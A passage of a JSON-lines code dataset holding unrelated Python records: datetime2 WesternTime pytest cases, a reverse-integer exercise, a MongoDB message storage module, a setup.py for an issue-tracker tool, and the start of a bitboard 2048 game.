Fraction(test_row[1][2])\n western = WesternTime.from_day_frac(day_frac)\n assert (western.hour, western.minute, western.second) == (\n hour,\n minute,\n second,\n )\n\n def test_100_invalid_parameter_types(self):\n # exception with none, two or four parameters\n with pytest.raises(TypeError):\n WesternTime()\n with pytest.raises(TypeError):\n WesternTime(1, 2)\n with pytest.raises(TypeError):\n WesternTime(1, 2, 3, 4)\n # exception with non-numeric types\n for invalid_par in (\"1\", (1,), [1], {1: 1}, (), [], {}, None):\n with pytest.raises(TypeError):\n WesternTime(invalid_par, 1, 1)\n with pytest.raises(TypeError):\n WesternTime(1, invalid_par, 1)\n for invalid_par in (\n (1,),\n [1],\n {1: 1},\n (),\n [],\n {},\n None,\n ): # \"1\" is acceptable for seconds, since it is a valid Fraction argument\n with pytest.raises(TypeError):\n WesternTime(1, 1, invalid_par)\n # exception with invalid numeric types\n for invalid_par in (1.0, Fraction(1, 1), Decimal(1), 1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n WesternTime(invalid_par, 1, 1)\n with pytest.raises(TypeError):\n WesternTime(1, invalid_par, 1)\n for invalid_par in (1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n WesternTime(1, 1, invalid_par)\n\n def test_110_invalid_parameter_types_in_hours(self):\n # exception with none, two or four parameters\n with pytest.raises(TypeError):\n WesternTime.in_hours()\n with pytest.raises(TypeError):\n WesternTime.in_hours(1, 2)\n # exception with non-numeric types\n for invalid_hours in ((1,), [1], {1: 1}, (), [], {}, None):\n with pytest.raises(TypeError):\n WesternTime.in_hours(invalid_hours)\n # exception with invalid numeric types\n for invalid_hours in (1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n WesternTime.in_hours(invalid_hours)\n\n def test_120_invalid_parameter_types_in_minutes(self):\n # exception with none, two or four parameters\n with pytest.raises(TypeError):\n WesternTime.in_minutes()\n with pytest.raises(TypeError):\n WesternTime.in_minutes(1, 2)\n # exception with non-numeric types\n for invalid_minutes in ((1,), [1], {1: 1}, (), [], {}, None):\n with pytest.raises(TypeError):\n WesternTime.in_minutes(invalid_minutes)\n # exception with invalid numeric types\n for invalid_minutes in (1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n WesternTime.in_minutes(invalid_minutes)\n\n def test_130_invalid_parameter_types_in_seconds(self):\n # exception with none, two or four parameters\n with pytest.raises(TypeError):\n WesternTime.in_seconds()\n with pytest.raises(TypeError):\n WesternTime.in_seconds(1, 2)\n\n # exception with non-numeric types\n for invalid_seconds in ((1,), [1], {1: 1}, (), [], {}, None):\n with pytest.raises(TypeError):\n WesternTime.in_seconds(invalid_seconds)\n\n # exception with invalid numeric types\n for invalid_seconds in (1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n WesternTime.in_seconds(invalid_seconds)\n\n def test_170_timezone_invalid(self):\n # exception with unknown named parameter\n with pytest.raises(TypeError):\n WesternTime(1, 2, 3, invalid=0)\n WesternTime.in_hours(\"789/123\", invalid=0)\n WesternTime.in_minutes(\"78901/123\", invalid=0)\n WesternTime.in_seconds(\"789012/123\", invalid=0)\n\n # exception with non-numeric types\n for invalid_to_utc in ((1,), [1], {1: 1}, (), [], {}):\n with pytest.raises(TypeError):\n WesternTime(1, 2, 3, to_utc=invalid_to_utc)\n with pytest.raises(TypeError):\n WesternTime.in_hours(\"789/123\", to_utc=invalid_to_utc)\n with pytest.raises(TypeError):\n WesternTime.in_minutes(\"78901/123\", to_utc=invalid_to_utc)\n with pytest.raises(TypeError):\n WesternTime.in_seconds(\"789012/123\", to_utc=invalid_to_utc)\n\n # exception with invalid numeric types\n for invalid_to_utc in (1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n WesternTime(1, 2, 3, to_utc=invalid_to_utc)\n with pytest.raises(TypeError):\n WesternTime.in_hours(\"789/123\", to_utc=invalid_to_utc)\n with pytest.raises(TypeError):\n WesternTime.in_minutes(\"78901/123\", to_utc=invalid_to_utc)\n with pytest.raises(TypeError):\n WesternTime.in_seconds(\"789012/123\", to_utc=invalid_to_utc)\n\n def test_190_invalid_parameter_types_day_frac(self):\n # exception with none, two or four parameters\n with pytest.raises(TypeError):\n WesternTime.from_day_frac()\n with pytest.raises(TypeError):\n WesternTime.from_day_frac(1, 2)\n\n # exception with non-numeric types\n for invalid_day_frac in (\"1\", (1,), [1], {1: 1}, (), [], {}, None):\n with pytest.raises(TypeError):\n WesternTime.from_day_frac(invalid_day_frac)\n\n # exception with invalid numeric types\n for invalid_day_frac in (1.0, Decimal(1), 1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n WesternTime.from_day_frac(invalid_day_frac)\n\n def test_200_invalid_values(self):\n for test_row in western_time_out_of_range_data:\n hour = test_row[0]\n minute = test_row[1]\n second = test_row[2]\n with pytest.raises(ValueError):\n WesternTime(hour, minute, second)\n\n def test_210_invalid_values_in_hours(self):\n for num, denum in ((24, 1), (1, -1), (24000001, 1000000), (-1, 1000000)):\n with pytest.raises(ValueError):\n WesternTime.in_hours(Fraction(num, denum))\n\n def test_220_invalid_values_in_minutes(self):\n for num, denum in ((1440, 1), (1, -1), (1440000001, 1000000), (-1, 1000000)):\n with pytest.raises(ValueError):\n WesternTime.in_minutes(Fraction(num, denum))\n\n def test_230_invalid_values_in_seconds(self):\n for num, denum in ((86400, 1), (1, -1), (86400000001, 1000000), (-1, 1000000)):\n with pytest.raises(ValueError):\n WesternTime.in_seconds(Fraction(num, denum))\n\n def test_260_timezone_invalid_values(self):\n for invalid_value in (-25, -24.000001, 24.000001, 25):\n with pytest.raises(ValueError):\n WesternTime(1, 2, 3, to_utc=invalid_value)\n with pytest.raises(ValueError):\n WesternTime.in_hours(\"789/123\", invalid_value)\n with pytest.raises(ValueError):\n WesternTime.in_minutes(\"78901/123\", invalid_value)\n with pytest.raises(ValueError):\n WesternTime.in_seconds(\"789012/123\", invalid_value)\n\n def test_290_invalid_values_day_frac(self):\n for num, denum in ((1, 1), (1, -1), (1000001, 1000000), (-1, 1000000)):\n with pytest.raises(ValueError):\n WesternTime.from_day_frac(Fraction(num, denum))\n\n def test_300_write_attribute(self):\n western = WesternTime(10, 10, 10)\n with pytest.raises(AttributeError):\n western.hour = 3\n with pytest.raises(AttributeError):\n western.minute = 3\n with pytest.raises(AttributeError):\n western.second = 3\n\n def test_310_write_attribute_to_utc(self):\n western = WesternTime(10, 10, 10, to_utc=10)\n with pytest.raises(AttributeError):\n western.to_utc = 3\n\n def test_500_compare(self):\n western1 = WesternTime(2, 3, 4)\n western2 = WesternTime(2, 3, 4)\n assert western1 == western2\n assert western1 <= western2\n assert western1 >= western2\n assert not western1 != western2\n assert not western1 < western2\n assert not western1 > western2\n\n for hour, minute, second in (3, 3, 3), (2, 4, 4), (2, 3, 5):\n western3 = WesternTime(hour, minute, second) # this is larger than western1\n assert western1 < western3\n assert western3 > western1\n assert western1 <= western3\n assert western3 >= western1\n assert western1 != western3\n assert western3 != western1\n assert not western1 == western3\n assert not western3 == western1\n assert not western1 > western3\n assert not western3 < western1\n assert not western1 >= western3\n assert not western3 <= western1\n\n def test_510_compare_invalid_types(self):\n class SomeClass:\n pass\n\n western = WesternTime(2, 3, 4)\n\n # exception with non-numeric types\n for par in (\"1\", (1,), [1], {1: 1}, (), [], {}, None):\n assert not western == par\n assert western != par\n with pytest.raises(TypeError):\n western < par\n with pytest.raises(TypeError):\n western > par\n with pytest.raises(TypeError):\n western <= par\n with pytest.raises(TypeError):\n western >= par\n # exception with numeric types (all invalid) and other objects\n for par in (\n 1,\n 1.0,\n Fraction(1, 1),\n Decimal(1),\n 1j,\n 1 + 1j,\n INF,\n NAN,\n SomeClass(),\n ):\n assert not western == par\n assert western != par\n with pytest.raises(TypeError):\n western < par\n with pytest.raises(TypeError):\n western > par\n with pytest.raises(TypeError):\n western <= par\n with pytest.raises(TypeError):\n western >= par\n\n def test_520_hash_equality(self):\n western1 = WesternTime(11, 12, 13)\n # same thing\n western2 = WesternTime(11, 12, 13)\n assert hash(western1) == hash(western2)\n\n dic = {western1: 1}\n dic[western2] = 2\n assert len(dic) == 1\n assert dic[western1] == 2\n assert dic[western2] == 2\n\n western3 = WesternTime(1, 12, 13).replace(hour=11)\n assert hash(western1) == hash(western3)\n\n dic[western3] = 2\n assert len(dic) == 1\n assert dic[western3] == 2\n\n def test_530_bool(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n assert WesternTime(hour, minute, second)\n\n def test_600_to_hours(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n to_hours = Fraction(test_row[2])\n assert WesternTime(hour, minute, second).to_hours() == to_hours\n\n def test_610_to_minutes(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n to_minutes = Fraction(test_row[3])\n assert WesternTime(hour, minute, second).to_minutes() == to_minutes\n\n def test_620_to_seconds(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n to_seconds = Fraction(test_row[4])\n assert WesternTime(hour, minute, second).to_seconds() == to_seconds\n\n def test_630_to_day_frac(self):\n for test_row in western_time_test_data:\n day_frac = Fraction(test_row[0])\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n assert WesternTime(hour, minute, second).to_day_frac() == day_frac\n\n def test_650_replace(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime(hour, minute, second)\n assert western.replace() == WesternTime(hour, minute, second)\n assert western.replace(hour=11) == WesternTime(11, minute, second)\n assert western.replace(minute=10) == WesternTime(hour, 10, second)\n assert western.replace(second=9) == WesternTime(hour, minute, 9)\n assert western.replace(minute=10, hour=11) == WesternTime(11, 10, second)\n assert western.replace(second=9, hour=11) == WesternTime(11, minute, 9)\n assert western.replace(second=9, minute=10) == WesternTime(hour, 10, 9)\n assert western.replace(second=9, minute=10, hour=11) == WesternTime(\n 11, 10, 9\n )\n\n def test_653_replace_invalid_types(self):\n western = WesternTime(11, 10, 9)\n # exception for positional parameters\n with pytest.raises(TypeError):\n western.replace(1)\n # exception with non-numeric types\n for par in (\"1\", (1,), [1], {1: 1}, (), [], {}):\n with pytest.raises(TypeError):\n western.replace(hour=par)\n with pytest.raises(TypeError):\n western.replace(minute=par)\n for par in ((1,), [1], {1: 1}, (), [], {}):\n with pytest.raises(TypeError):\n western.replace(second=par)\n # exception with invalid numeric types\n for par in (1.0, Fraction(1, 1), Decimal(1), 1j, 1 + 1j, INF, NAN):\n with pytest.raises(TypeError):\n western.replace(hour=par)\n with pytest.raises(TypeError):\n western.replace(minute=par)\n for par in (1j, 1 + 1j, INF):\n with pytest.raises(TypeError):\n western.replace(second=par)\n\n def test_656_replace_invalid_values(self):\n western1 = WesternTime(11, 10, 9)\n with pytest.raises(ValueError):\n western1.replace(hour=-1)\n with pytest.raises(ValueError):\n western1.replace(minute=-1)\n with pytest.raises(ValueError):\n western1.replace(second=-1)\n with pytest.raises(ValueError):\n western1.replace(hour=24)\n with pytest.raises(ValueError):\n western1.replace(minute=60)\n with pytest.raises(ValueError):\n western1.replace(second=60)\n with pytest.raises(TypeError):\n western1.replace(second=NAN)\n\n def test_700_repr(self):\n import datetime2\n\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime(hour, minute, second)\n western_repr = repr(western)\n assert western_repr.startswith(\n \"datetime2.western.WesternTime(\"\n ) and western_repr.endswith(\")\")\n args = western_repr[30:-1]\n found_hour, found_minute, found_second = args.split(\",\", 2)\n assert western == eval(western_repr)\n assert int(found_hour.strip()) == hour\n assert int(found_minute.strip()) == minute\n assert Fraction(eval(found_second)) == second\n\n def test_720_str(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime(hour, minute, second)\n expected = \"{:02d}:{:02d}:{:02d}\".format(hour, minute, floor(second))\n assert str(western) == expected\n\n def test_730_cformat_numbers(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime(hour, minute, second)\n # hours\n assert western.cformat(\"%H\") == \"{:02d}\".format(hour)\n if hour == 0:\n assert western.cformat(\"%I\") == \"12\"\n assert western.cformat(\"%p\") == \"AM\"\n elif hour <= 11:\n assert western.cformat(\"%I\") == \"{:02d}\".format(hour)\n assert western.cformat(\"%p\") == \"AM\"\n elif hour == 12:\n assert western.cformat(\"%I\") == \"{:02d}\".format(hour)\n assert western.cformat(\"%p\") == \"PM\"\n else:\n assert western.cformat(\"%I\") == \"{:02d}\".format(hour - 12)\n assert western.cformat(\"%p\") == \"PM\"\n # minutes and seconds\n assert western.cformat(\"%M\") == \"{:02d}\".format(minute)\n assert western.cformat(\"%S\") == \"{:02d}\".format(floor(second))\n\n def test_740_cformat_microseconds(self):\n for fraction, microseconds in western_time_microseconds:\n western = WesternTime.in_seconds(Fraction(fraction))\n assert western.cformat(\"%f\") == microseconds\n\n def test_750_cformat_percent(self):\n western = WesternTime(1, 2, 3)\n assert western.cformat(\"%\") == \"%\"\n assert western.cformat(\"%%\") == \"%\"\n assert western.cformat(\"%%%\") == \"%%\"\n assert western.cformat(\"abcd%\") == \"abcd%\"\n assert western.cformat(\"%k\") == \"%k\"\n assert western.cformat(\"a%k\") == \"a%k\"\n assert western.cformat(\"%k%\") == \"%k%\"\n\n def test_760_cformat_invalid_type(self):\n western = WesternTime(1, 2, 3)\n for par in (1, (1,), [1], {1: 1}, None):\n with pytest.raises(TypeError):\n western.cformat(par)\n\n def test_900_pickling(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime(hour, minute, second)\n for protocol in range(pickle.HIGHEST_PROTOCOL + 1):\n pickled = pickle.dumps(western, protocol)\n derived = pickle.loads(pickled)\n assert western == derived\n\n def test_920_subclass(self):\n class W(WesternTime):\n theAnswer = 42\n\n def __init__(self, *args, **kws):\n temp = kws.copy()\n self.extra = temp.pop(\"extra\")\n WesternTime.__init__(self, *args, **temp)\n\n def newmeth(self, start):\n return start + self.hour + self.second\n\n western1 = WesternTime(11, 12, 13)\n western2 = W(11, 12, 13, extra=7)\n\n assert western2.theAnswer == 42\n assert western2.extra == 7\n assert western1.to_day_frac() == western2.to_day_frac()\n assert western2.newmeth(-7) == western1.hour + western1.second - 7\n","sub_path":"tests/time_representations/test_western_time.py","file_name":"test_western_time.py","file_ext":"py","file_size_in_byte":28056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"354635036","text":"# encoding:utf-8\n\n'''注意事项\n1、末尾有0\n2、负数\n3、上溢、下溢\n'''\n\n\ndef reverse(x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n s_min = str(2 ** 31)\n if x == 0:\n return 0\n if x < 0:\n sign = '-'\n else:\n sign = ''\n s = str(x).lstrip('-').rstrip('0')[::-1]\n if len(s) >= 10 and s > s_min:\n return 0\n else:\n return int(sign + s)\n\n print(s)\n\n\ndef reverse1(x):\n s = -1 # cmp(x, 0)\n r = int('s*x'[::-1])\n return s * r * (r < 2 ** 31)\n\n\ndef reverse2(x):\n if x == 0:\n return 0\n sign = 1\n if x < 0:\n sign = -1\n tmp = int(str(x * sign)[::-1])\n return tmp * sign * (tmp < 2 ** 31)\n\n\nif __name__ == '__main__':\n x = -10 # -120#-123#1534236469\n print(reverse2(x))\n","sub_path":"simple/reverse-integer.py","file_name":"reverse-integer.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"505338563","text":"#!/usr/bin/python2.7\n# Copyright 2012 JatLeGo Inc. All Rights Reserved.\n# Author: andyzh1314@gmail.com (Andy Zhau)\n\nimport bson\nimport time\n\nfrom base import logging\nfrom dsc.framework.db import datasource_pb2\nfrom dsc.framework.db import messages_pb2\nfrom dsc.framework.mongodb import db\nfrom pymongo import ASCENDING\nfrom pymongo import DESCENDING\nfrom util.pb import DictToProtobuf\nfrom util.pb import ProtobufToDict\n\n\n_DataSources = [\"all\", \"dsc\", \"twitter\", \"weibo\"]\n_MessageLineNames = [\"homeline\", \"mentions\", \"favorites\", \"comments\", \"reshare\"]\n_UserMessageLine = (messages_pb2.HOMELINE, messages_pb2.MENTIONS,\n messages_pb2.FAVORITES)\n_MessageMessageLine = (messages_pb2.COMMENTS, messages_pb2.RESHARE)\n\n_MessageCollection = db[\"messages_v2\"]\n_Collection = lambda ds, ml: (\n _MessageCollection[_MessageLineNames[ml]][_DataSources[ds]])\n\n_CreateTime = lambda m: max(m.dsc.create_time, m.twitter.create_time,\n m.weibo.create_time)\n\ndef _Query(l):\n if l[\"messageline_type\"] in _UserMessageLine:\n if l[\"uid\"] is None:\n raise ValueError(\"uid could not be None for [messages.%s.%s].\" % (\n _MessageLineNames[l[\"messageline_type\"]],\n _DataSources[l[\"datasource\"]]))\n return { \"uid\": l[\"uid\"] }\n elif l[\"messageline_type\"] in _MessageMessageLine:\n if l[\"omid\"] is None:\n raise ValueError(\"omid could not be None for [messages.%s.%s].\" % (\n _MessageLineNames[l[\"messageline_type\"]],\n _DataSources[l[\"datasource\"]]))\n return { \"omid\": l[\"omid\"] }\n\nclass MessageDb(object):\n\n\n def __init__(self, safe):\n self.safe = safe\n #self.EnsureIndex()\n\n def GetMessageLine(self, datasource, messageline_type, since_id=None,\n max_id=None, count=20, uid=None, omid=None):\n collection = _Collection(datasource, messageline_type)\n query = _Query(locals())\n\n since_ct = max_ct = None\n if since_id is not None:\n q = _Query(locals())\n q[\"mid\"] = since_id\n doc = collection.find_one(q)\n if doc is None:\n raise ValueError(\n \"Since id [%s] doesn't exists under collection [%s].\" % (\n since_id, collection.name))\n query.setdefault(\"create_time\", {})\n query[\"create_time\"][\"$gte\"] = since_ct = doc[\"create_time\"]\n if max_id is not None:\n q = _Query(locals())\n q[\"mid\"] = max_id\n doc = collection.find_one(q)\n if doc is None:\n raise ValueError(\n \"Max id [%s] doesn't exists under collection [%s].\" % (\n max_id, collection.name))\n query.setdefault(\"create_time\", {})\n query[\"create_time\"][\"$lte\"] = max_ct = doc[\"create_time\"]\n messages = []\n for doc in collection.find(query, sort=[(\"create_time\", DESCENDING),\n (\"mid\", DESCENDING)]):\n if max_ct == doc[\"create_time\"] and doc[\"mid\"] >= max_ct:\n continue\n if since_ct == doc[\"create_time\"] and doc[\"mid\"] <= since_id:\n break\n m = self.GetMessage(mid=doc[\"mid\"])\n if m is None:\n logging.Error(\"Wrong mid [%s] found in message lines.\" % doc[\"mid\"])\n messages.append(m)\n if len(messages) >= count:\n break\n return messages\n\n def UpdateMessageLine(self, datasource, messageline_type, messages, uid=None,\n omid=None):\n last_update = int(time.time())\n\n def UpdateIfNotExists(collection, query, message):\n doc = collection.find_one(query)\n if doc is None:\n doc = {\n \"_id\": bson.ObjectId(),\n \"mid\": message._id,\n \"create_time\": _CreateTime(message),\n \"last_update\": last_update,\n }\n if uid is not None: doc[\"uid\"] = uid\n if omid is not None: doc[\"omid\"] = omid\n collection.save(doc)\n else:\n collection.update({\"_id\": doc[\"_id\"]},\n {\"$set\": {\"last_update\": last_update}})\n\n dscollection = _Collection(datasource, messageline_type)\n allcollection = _Collection(0, messageline_type)\n for message in messages:\n query = _Query(locals())\n query[\"mid\"] = message._id\n UpdateIfNotExists(dscollection, query, message)\n UpdateIfNotExists(allcollection, query, message)\n\n def UpdateCreateTime(self, message):\n datasources = [datasource_pb2.ALL]\n if message.dsc.create_time:\n datasources.append(datasource_pb2.DSC)\n if message.twitter.create_time:\n datasources.append(datasource_pb2.TWITTER)\n if message.weibo.create_time:\n datasources.append(datasource_pb2.WEIBO)\n for ds in datasources:\n for ml in _UserMessageLine + _MessageMessageLine:\n c = _Collection(ds, ml)\n c.update({\"mid\": message._id},\n {\"$set\": {\"create_time\": _CreateTime(message)}}, multi=True)\n\n @classmethod\n def EnsureIndex(cls):\n _MessageCollection.ensure_index(\n \"dsc.id\", name=\"dsc_id\", unique=True, sparse=True)\n _MessageCollection.ensure_index(\n \"twitter.id\", name=\"twitter_id\", unique=True, sparse=True)\n _MessageCollection.ensure_index(\n \"weibo.id\", name=\"weibo_id\", unique=True, sparse=True)\n for ds in range(4):\n for ml in range(3):\n if ml in _UserMessageLine:\n _Collection.ensure_index([(\"mid\", ASCENDING),\n (\"uid\", ASCENDING)])\n _Collection(ds, ml).ensure_index([(\"uid\", ASCENDING),\n (\"create_time\", DESCENDING),\n (\"last_update\", DESCENDING)])\n elif ml in _MessageMessageLine:\n _Collection.ensure_index([(\"mid\", ASCENDING),\n (\"omid\", ASCENDING)])\n _Collection(ds, ml).ensure_index([(\"omid\", ASCENDING),\n (\"create_time\", DESCENDING),\n (\"last_update\", DESCENDING)])\n\n def SaveMessage(self, message):\n \"\"\" Save the mesage, if no field set up for _id, insert a value on it. \"\"\"\n if not message._id: message._id = str(bson.ObjectId())\n self._SaveMessageProtobuf(message)\n return message\n\n def CreateMessage(self, uid, text, twitter=False, weibo=False):\n \"\"\" Create a message record of mongodb.\n\n This function will set current utc timestamp to dsc field, and put the text\n message into dsc field also other fields if neccessary.\n\n In this step the twitter or weibo message id is not stored, so use\n UpdateMessage later when the information is ready.\n\n Args:\n uid: The id of the user creates the message.\n text: The text of the message.\n twitter: Whether the current text will be applied to twitter sub-field.\n weibo: Whether the current text will be applied to weibo sub-field.\n\n Returns:\n The message record protobuf, instance of messages_pb2.Message.\n\n Raises:\n ValueError: When the uid is not valid or text is empty string or\n non-readable.\n\n \"\"\"\n logging.Info(\"Create message.\")\n if uid is None:\n raise ValueError(\"Uid can't be none.\")\n if not text:\n raise ValueError(\"Text should not be empty.\")\n create_time = int(time.time())\n doc = {\n \"_id\": bson.ObjectId(),\n \"dsc\": {\n \"text\": text,\n \"uid\": unicode(uid),\n \"create_time\": create_time,\n \"last_update\": create_time,\n },\n \"twitter\": {},\n \"weibo\": {},\n }\n doc[\"dsc\"][\"id\"] = str(doc[\"_id\"])\n if twitter: doc[\"twitter\"] = { \"text\": text, \"last_update\": create_time }\n if weibo: doc[\"weibo\"] = { \"text\": text, \"last_update\": create_time }\n self._SaveMessageDoc(doc)\n return self._DocToMessageProtobuf(doc)\n\n def UpdateMessage(self, message, twitter_mid=None, weibo_mid=None,\n twitter_comments_count=None, weibo_reshare_count=None,\n weibo_comments_count=None, dsc_id_range_min=None,\n dsc_id_range_max=None, twitter_id_range_min=None,\n twitter_id_range_max=None, weibo_id_range_min=None,\n weibo_id_range_max=None):\n \"\"\" Update the current message protobuf to mongodb.\n\n Args are the field values going to update.\n\n Returns:\n The message updated protobuf.\n\n Raises:\n TypeError: if the type of parameter is not correct.\n\n \"\"\"\n updator = {}\n if twitter_mid is not None:\n if message.twitter.id:\n raise ValueError(\n \"Twitter mid already exists, message [%s].\" % unicode(message))\n # Verify the value type is accept, same as below.\n updator[\"twitter.id\"] = message.twitter.id = str(twitter_mid)\n if weibo_mid is not None:\n if message.weibo.id:\n raise ValueError(\n \"Weibo mid already exists, message [%s].\" % unicode(message))\n updator[\"weibo.id\"] = message.weibo.id = str(weibo_mid)\n\n for src, item in ((\"twitter\", \"comments_count\"),\n (\"weibo\", \"comments_count\"),\n (\"weibo\", \"reshare_count\")):\n new_val = locals()[src + \"_\" + item]\n if (new_val is not None and\n new_val != getattr(getattr(message, src), item)):\n updator[src + \".\" + item] = new_val\n try:\n setattr(getattr(message, src), item, new_val)\n except TypeError as e:\n raise TypeError(\n \"Type of %s_%s wrong, the value %s\" % (src, item, str(e)))\n\n for src in (\"dsc\", \"twitter\", \"weibo\"):\n for item in (\"id_range_min\", \"id_range_max\"):\n new_val = locals()[src + \"_\" + item]\n if new_val is None:\n continue\n new_val = str(new_val)\n if (getattr(getattr(message, src), item) != new_val and\n getattr(message, src).id != new_val):\n updator[src + \".\" + item] = new_val\n try:\n setattr(getattr(message, src), item, new_val)\n except TypeError as e:\n raise TypeError(\n \"Type of %s_%s wrong, the value %s\" % (src, item, str(e)))\n if updator:\n _MessageCollection.update(\n {\"_id\": bson.ObjectId(message._id)}, {\"$set\": updator}, safe=self.safe)\n return self.GetMessage(mid=message._id, verify=self.safe)\n\n def GetMessage(self, mid=None, dsc_mid=None, twitter_mid=None, weibo_mid=None,\n verify=False):\n \"\"\" Get the message record protobuf of mongodb.\n\n \"\"\"\n if mid is not None: query = { \"_id\": bson.ObjectId(mid) }\n elif dsc_mid is not None: query = { \"dsc.id\": str(dsc_mid) }\n elif twitter_mid is not None: query = { \"twitter.id\": str(twitter_mid) }\n elif weibo_mid is not None: query = { \"weibo.id\": str(weibo_mid) }\n else: raise ValueError(\"No useful information found.\")\n return self._DocToMessageProtobuf(_MessageCollection.find_one(query))\n\n @staticmethod\n def _DocToMessageProtobuf(doc, verify=False):\n \"\"\" Convert doc to message protobuf. \"\"\"\n message = DictToProtobuf(doc, messages_pb2.Message())\n if verify: self._Verify(message)\n return message\n\n def _SaveMessageProtobuf(self, message):\n def Default(field, value):\n if field.name == \"_id\": return bson.ObjectId(value)\n return value\n self._SaveMessageDoc(ProtobufToDict(message, default=Default))\n\n def _SaveMessageDoc(self, doc):\n try:\n _MessageCollection.save(doc, safe=self.safe)\n except Exception as e:\n logging.Exception(e)\n raise\n\n @staticmethod\n def _Verify(message):\n return message.IsInitialized()\n","sub_path":"dsc/framework/db/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":11422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"587962882","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup\n\nlong_description = open('README.md').read() + '\\n' + open('HISTORY.md').read()\n\nsetup(\n name='tisu',\n version='1.1',\n description=\"your project's issue tracker, in a text file\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n author=u'Martín Gaitán',\n author_email='gaitan@gmail.com',\n url='https://github.com/mgaitan/tissue',\n license='BSD',\n keywords=\"github issues tracking bugs markdown\",\n packages=['tisu'],\n install_requires=['recommonmark', 'pygithub', 'docopt'],\n entry_points={\n 'console_scripts': ['tisu=tisu.cli:main'],\n },\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"459582195","text":"import collections, random\nimport numpy as np\nimport copy\nimport random as rand\n\nclass Game_2048:\n '''\n Creates a game of 2048.\n Access self.board in the same way as a matrix, i.e. self.board[row][col].\n '''\n \n def __init__(self, board, tableL, tableR, scoreTable):\n self.size = 4\n self.board = 1 << (4 * rand.randint(0,15))\n self.options = ['a', 's', 'd', 'w']\n self.randomize = False\n if tableL != None:\n self.tableL = tableL\n self.tableR = tableR\n self.scoreTable = scoreTable\n else:\n self.initTables()\n\n\n '''\n -----------------\n UTILITY FUNCTIONS\n -----------------\n '''\n def initTables(self):\n self.tableL = {}\n self.tableR = {}\n self.scoreTable = {}\n num = self.size << 2\n for a in range(num):\n for b in range(num):\n for c in range(num):\n for d in range(num):\n row = np.asarray([a,b,c,d])\n if sum(row) == 0:\n self.tableL[0] = 0\n self.tableR[0] = 0\n self.scoreTable[0] = 0\n continue\n rowL = row[row != 0].copy()\n rowR = row[row != 0]\n rowlist = rowL.tolist()\n for i in range(rowL.size - 1):\n if rowlist[i] == rowlist[i + 1]:\n rowlist[i] += 1\n rowlist[i + 1] = 0\n newrowL = [x for x in rowlist if x != 0]\n newrowL = np.asarray(newrowL + np.zeros(self.size - len(newrowL)).tolist())\n newrowL = list(map(int, newrowL))\n rowlist = rowR.tolist()\n for i in range(rowR.size - 1, 0, -1):\n if rowlist[i] == rowlist[i - 1]:\n rowlist[i] += 1\n rowlist[i - 1] = 0\n newrowR = [x for x in rowlist if x != 0]\n newrowR = np.asarray(np.zeros(self.size - len(newrowR)).tolist() + newrowR)\n newrowR = list(map(int, newrowR))\n key = row[0] << 12 | row[1] << 8 | row[2] << 4 | row[3]\n valL = newrowL[0] << 12 | newrowL[1] << 8 | newrowL[2] << 4 | newrowL[3]\n valR = newrowR[0] << 12 | newrowR[1] << 8 | newrowR[2] << 4 | newrowR[3]\n self.tableL[key] = valL\n self.tableR[key] = valR\n score = 0\n for x in range(self.size):\n val = row[x]\n if val > 1:\n score += (val - 1) * (1 << val)\n self.scoreTable[key] = score\n \n \n def bitToBoard(self):\n board = np.zeros(self.size ** 2)\n for k in range(self.size ** 2):\n board[k] = 1 << ((self.board >> (4 * k)) & 0xF)\n if board[k] == 1:\n board[k] = 0\n board = board[::-1].reshape((self.size, self.size))\n return board\n \n def printBoard(self):\n print(self.bitToBoard())\n print('')\n\n def countZeros(self):\n count = 0\n for x in range(self.size ** 2):\n i = 0xF << x\n if i & self.board == 0:\n count+=1\n return count\n \n def emptyPos(self):\n lst = []\n for x in range(self.size ** 2):\n i = 0xF << (4 * x)\n if i & self.board == 0:\n lst.append(x)\n return lst\n \n def transpose(self,board):\n c1 = board & 0xF0F00F0FF0F00F0F\n c2 = board & 0x0000F0F00000F0F0\n c3 = board & 0x0F0F00000F0F0000\n c = c1 | (c2 << 12) | (c3 >> 